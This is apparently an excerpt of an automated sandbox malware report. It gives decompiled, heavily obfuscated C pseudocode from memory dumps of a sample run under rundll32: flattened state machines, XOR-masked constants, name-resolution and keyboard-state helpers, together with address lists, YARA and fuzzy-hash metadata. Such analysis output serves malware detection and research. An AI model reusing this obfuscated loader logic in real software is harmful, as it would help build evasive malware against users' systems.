				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E0069847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E00687FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E0069847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}



































                                                                                                                      0x0068481d
                                                                                                                      0x00684821
                                                                                                                      0x00684823
                                                                                                                      0x00684827
                                                                                                                      0x0068482b
                                                                                                                      0x0068482f
                                                                                                                      0x00684830
                                                                                                                      0x00684831
                                                                                                                      0x00684836
                                                                                                                      0x0068483b
                                                                                                                      0x0068483e
                                                                                                                      0x00684848
                                                                                                                      0x00684850
                                                                                                                      0x00684852
                                                                                                                      0x0068485a
                                                                                                                      0x0068485f
                                                                                                                      0x00684867
                                                                                                                      0x0068486c
                                                                                                                      0x00684874
                                                                                                                      0x00684879
                                                                                                                      0x00684881
                                                                                                                      0x00684889
                                                                                                                      0x0068488e
                                                                                                                      0x00684896
                                                                                                                      0x0068489e
                                                                                                                      0x006848a6
                                                                                                                      0x006848ae
                                                                                                                      0x006848b3
                                                                                                                      0x006848bb
                                                                                                                      0x006848c3
                                                                                                                      0x006848cb
                                                                                                                      0x006848d3
                                                                                                                      0x006848db
                                                                                                                      0x006848ea
                                                                                                                      0x006848ed
                                                                                                                      0x006848f1
                                                                                                                      0x006848f6
                                                                                                                      0x006848fe
                                                                                                                      0x00684906
                                                                                                                      0x0068490e
                                                                                                                      0x00684916
                                                                                                                      0x0068491e
                                                                                                                      0x00684926
                                                                                                                      0x0068492e
                                                                                                                      0x00684936
                                                                                                                      0x0068493e
                                                                                                                      0x00684948
                                                                                                                      0x0068494c
                                                                                                                      0x00684954
                                                                                                                      0x0068495c
                                                                                                                      0x00684964
                                                                                                                      0x0068496c
                                                                                                                      0x0068497c
                                                                                                                      0x00684980
                                                                                                                      0x00684988
                                                                                                                      0x00684994
                                                                                                                      0x00684997
                                                                                                                      0x0068499b
                                                                                                                      0x006849a3
                                                                                                                      0x006849ab
                                                                                                                      0x006849b3
                                                                                                                      0x006849bb
                                                                                                                      0x006849c3
                                                                                                                      0x006849cb
                                                                                                                      0x006849d5
                                                                                                                      0x006849e3
                                                                                                                      0x006849e8
                                                                                                                      0x006849ee
                                                                                                                      0x006849fb
                                                                                                                      0x00684a03
                                                                                                                      0x00684a0b
                                                                                                                      0x00684a13
                                                                                                                      0x00684a1b
                                                                                                                      0x00684a23
                                                                                                                      0x00684a2f
                                                                                                                      0x00684a37
                                                                                                                      0x00684a3b
                                                                                                                      0x00684a43
                                                                                                                      0x00684a4b
                                                                                                                      0x00684a53
                                                                                                                      0x00684a5b
                                                                                                                      0x00684a63
                                                                                                                      0x00684a6b
                                                                                                                      0x00684a73
                                                                                                                      0x00684a7b
                                                                                                                      0x00684a83
                                                                                                                      0x00684a83
                                                                                                                      0x00684a8d
                                                                                                                      0x00684ac9
                                                                                                                      0x00000000
                                                                                                                      0x00684a8f
                                                                                                                      0x00684a91
                                                                                                                      0x00684b4f
                                                                                                                      0x00684a97
                                                                                                                      0x00684a9d
                                                                                                                      0x00000000
                                                                                                                      0x00684a9f
                                                                                                                      0x00684aaf
                                                                                                                      0x00684ab0
                                                                                                                      0x00684ab9
                                                                                                                      0x00684abf
                                                                                                                      0x00684ac5
                                                                                                                      0x00000000
                                                                                                                      0x00684ac5
                                                                                                                      0x00684abf
                                                                                                                      0x00684a9d
                                                                                                                      0x00684a91
                                                                                                                      0x00684b58
                                                                                                                      0x00684b60
                                                                                                                      0x00684b60
                                                                                                                      0x00684afa
                                                                                                                      0x00684aff
                                                                                                                      0x00684b04
                                                                                                                      0x00684b10
                                                                                                                      0x00000000
                                                                                                                      0x00684b06
                                                                                                                      0x00684b06
                                                                                                                      0x00000000
                                                                                                                      0x00684b06
                                                                                                                      0x00000000
                                                                                                                      0x00684b15
                                                                                                                      0x00684b15
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -e$62$?M'$h\c$z
                                                                                                                      • API String ID: 0-1842174784
                                                                                                                      • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                      • Instruction ID: ab440dd356f85c883050a918f333ba01c0b0892ce4f239f630462a102046dd99
                                                                                                                      • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                      • Instruction Fuzzy Hash: 5A812E715093819FD7A8CF61D58991BBBF2FBC9758F408A0CF29586260D7B6CA08CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069BE27 Relevance: 6.4, Strings: 5, Instructions: 130COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0069BE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E0068ADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E0069DBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E0068CDCD(_v56, _v20);
					}
					_t139 = E0069CADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}



























                                                                                                                      0x0069be30
                                                                                                                      0x0069be39
                                                                                                                      0x0069be3d
                                                                                                                      0x0069be44
                                                                                                                      0x0069be4b
                                                                                                                      0x0069be52
                                                                                                                      0x0069be59
                                                                                                                      0x0069be60
                                                                                                                      0x0069be67
                                                                                                                      0x0069be6e
                                                                                                                      0x0069be72
                                                                                                                      0x0069be79
                                                                                                                      0x0069be80
                                                                                                                      0x0069be87
                                                                                                                      0x0069be8e
                                                                                                                      0x0069be95
                                                                                                                      0x0069bea3
                                                                                                                      0x0069bea5
                                                                                                                      0x0069beaa
                                                                                                                      0x0069beb2
                                                                                                                      0x0069beb7
                                                                                                                      0x0069bebc
                                                                                                                      0x0069bec3
                                                                                                                      0x0069beca
                                                                                                                      0x0069bece
                                                                                                                      0x0069bed5
                                                                                                                      0x0069bedc
                                                                                                                      0x0069bee3
                                                                                                                      0x0069beea
                                                                                                                      0x0069bef1
                                                                                                                      0x0069bef8
                                                                                                                      0x0069beff
                                                                                                                      0x0069bf06
                                                                                                                      0x0069bf0a
                                                                                                                      0x0069bf11
                                                                                                                      0x0069bf18
                                                                                                                      0x0069bf1c
                                                                                                                      0x0069bf20
                                                                                                                      0x0069bf27
                                                                                                                      0x0069bf2e
                                                                                                                      0x0069bf35
                                                                                                                      0x0069bf3c
                                                                                                                      0x0069bf49
                                                                                                                      0x0069bf50
                                                                                                                      0x0069bf5b
                                                                                                                      0x0069bf5c
                                                                                                                      0x0069bf5f
                                                                                                                      0x0069bf66
                                                                                                                      0x0069bf6d
                                                                                                                      0x0069bf74
                                                                                                                      0x0069bf80
                                                                                                                      0x0069bf86
                                                                                                                      0x0069bf89
                                                                                                                      0x0069bf90
                                                                                                                      0x0069bf97
                                                                                                                      0x0069bf9e
                                                                                                                      0x0069bfa1
                                                                                                                      0x0069bfa8
                                                                                                                      0x0069bfb9
                                                                                                                      0x0069bfb9
                                                                                                                      0x0069bfbd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069bfb3
                                                                                                                      0x0069bfc1
                                                                                                                      0x0069bfb5
                                                                                                                      0x0069bfb5
                                                                                                                      0x0069bfb7
                                                                                                                      0x0069bfb8
                                                                                                                      0x00000000
                                                                                                                      0x0069bfb8
                                                                                                                      0x0069bfc4
                                                                                                                      0x0069bfd9
                                                                                                                      0x0069bfdf
                                                                                                                      0x0069bffd
                                                                                                                      0x0069c00c
                                                                                                                      0x0069c011
                                                                                                                      0x0069c019
                                                                                                                      0x0069c01a
                                                                                                                      0x0069c023
                                                                                                                      0x00000000
                                                                                                                      0x0069c029
                                                                                                                      0x0069bff0
                                                                                                                      0x0069bff5
                                                                                                                      0x0069bffb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069c031
                                                                                                                      0x0069c031
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                      • API String ID: 0-1567385930
                                                                                                                      • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                      • Instruction ID: ecf6408dd70ecb5f1927dd7496d006af5c3d080eec0791fc5cab5b610c65fd5a
                                                                                                                      • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                      • Instruction Fuzzy Hash: E6513371C05219EBDF58DFA4E94A8EEFBB2FF04314F208159D412BA260C3B51A56CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006920BA Relevance: 5.2, Strings: 4, Instructions: 240COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 76%
                                                                                                                      			E006920BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E0069DA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E00682051(_v536,  &_v520, _v604);
							_t254 =  *0x6a3e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x6a3e10 = E00687FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E00698F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E0068912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x6a3e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x6a3e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E006946BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E0068A55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}













































                                                                                                                      0x006920ba
                                                                                                                      0x006920c0
                                                                                                                      0x006920ca
                                                                                                                      0x006920d2
                                                                                                                      0x006920d7
                                                                                                                      0x006920df
                                                                                                                      0x006920e7
                                                                                                                      0x006920ef
                                                                                                                      0x006920f7
                                                                                                                      0x006920fc
                                                                                                                      0x00692104
                                                                                                                      0x0069210c
                                                                                                                      0x00692114
                                                                                                                      0x0069211c
                                                                                                                      0x00692121
                                                                                                                      0x00692129
                                                                                                                      0x00692131
                                                                                                                      0x00692139
                                                                                                                      0x00692141
                                                                                                                      0x00692152
                                                                                                                      0x00692156
                                                                                                                      0x00692158
                                                                                                                      0x0069215d
                                                                                                                      0x00692165
                                                                                                                      0x0069216d
                                                                                                                      0x00692172
                                                                                                                      0x0069217a
                                                                                                                      0x00692182
                                                                                                                      0x0069218a
                                                                                                                      0x00692192
                                                                                                                      0x0069219a
                                                                                                                      0x0069219f
                                                                                                                      0x006921a7
                                                                                                                      0x006921af
                                                                                                                      0x006921b4
                                                                                                                      0x006921bc
                                                                                                                      0x006921c4
                                                                                                                      0x006921cc
                                                                                                                      0x006921d7
                                                                                                                      0x006921dc
                                                                                                                      0x006921e6
                                                                                                                      0x006921eb
                                                                                                                      0x006921f1
                                                                                                                      0x006921f9
                                                                                                                      0x00692201
                                                                                                                      0x00692206
                                                                                                                      0x0069220e
                                                                                                                      0x00692216
                                                                                                                      0x0069221e
                                                                                                                      0x0069222b
                                                                                                                      0x0069222c
                                                                                                                      0x00692230
                                                                                                                      0x00692238
                                                                                                                      0x00692240
                                                                                                                      0x00692245
                                                                                                                      0x0069224d
                                                                                                                      0x00692255
                                                                                                                      0x0069225d
                                                                                                                      0x00692265
                                                                                                                      0x0069226d
                                                                                                                      0x00692275
                                                                                                                      0x00692280
                                                                                                                      0x00692289
                                                                                                                      0x0069228d
                                                                                                                      0x00692297
                                                                                                                      0x006922a4
                                                                                                                      0x006922b1
                                                                                                                      0x006922b9
                                                                                                                      0x006922c1
                                                                                                                      0x006922c9
                                                                                                                      0x006922d1
                                                                                                                      0x006922d5
                                                                                                                      0x006922dd
                                                                                                                      0x006922e5
                                                                                                                      0x006922ed
                                                                                                                      0x006922f5
                                                                                                                      0x006922fd
                                                                                                                      0x00692305
                                                                                                                      0x0069230d
                                                                                                                      0x00692315
                                                                                                                      0x0069231d
                                                                                                                      0x0069232c
                                                                                                                      0x0069232d
                                                                                                                      0x00692331
                                                                                                                      0x00692339
                                                                                                                      0x00692341
                                                                                                                      0x00692346
                                                                                                                      0x0069234e
                                                                                                                      0x00692356
                                                                                                                      0x0069235e
                                                                                                                      0x00692363
                                                                                                                      0x0069236b
                                                                                                                      0x00692373
                                                                                                                      0x00692378
                                                                                                                      0x00692380
                                                                                                                      0x00692388
                                                                                                                      0x00692396
                                                                                                                      0x0069239a
                                                                                                                      0x0069239e
                                                                                                                      0x006923a6
                                                                                                                      0x006923ae
                                                                                                                      0x006923b6
                                                                                                                      0x006923bb
                                                                                                                      0x006923bb
                                                                                                                      0x006923c3
                                                                                                                      0x006923c3
                                                                                                                      0x006923c3
                                                                                                                      0x006923c3
                                                                                                                      0x006923c5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006923cb
                                                                                                                      0x00692519
                                                                                                                      0x00692532
                                                                                                                      0x00692537
                                                                                                                      0x00692540
                                                                                                                      0x006923d1
                                                                                                                      0x006923d7
                                                                                                                      0x0069243c
                                                                                                                      0x0069243d
                                                                                                                      0x00692445
                                                                                                                      0x0069244a
                                                                                                                      0x00000000
                                                                                                                      0x006923d9
                                                                                                                      0x006923df
                                                                                                                      0x00692420
                                                                                                                      0x00692425
                                                                                                                      0x00000000
                                                                                                                      0x006923e1
                                                                                                                      0x006923e7
                                                                                                                      0x00692416
                                                                                                                      0x00000000
                                                                                                                      0x006923e9
                                                                                                                      0x006923ef
                                                                                                                      0x00000000
                                                                                                                      0x006923f5
                                                                                                                      0x00692406
                                                                                                                      0x0069240b
                                                                                                                      0x0069240e
                                                                                                                      0x0069240e
                                                                                                                      0x00000000
                                                                                                                      0x0069240e
                                                                                                                      0x006923ef
                                                                                                                      0x006923e7
                                                                                                                      0x006923df
                                                                                                                      0x006923d7
                                                                                                                      0x00692544
                                                                                                                      0x0069254f
                                                                                                                      0x0069254f
                                                                                                                      0x00692454
                                                                                                                      0x0069245a
                                                                                                                      0x006924ca
                                                                                                                      0x006924cf
                                                                                                                      0x006924d1
                                                                                                                      0x006924d4
                                                                                                                      0x006924d6
                                                                                                                      0x006924f0
                                                                                                                      0x00000000
                                                                                                                      0x006924d8
                                                                                                                      0x006924d8
                                                                                                                      0x006924e0
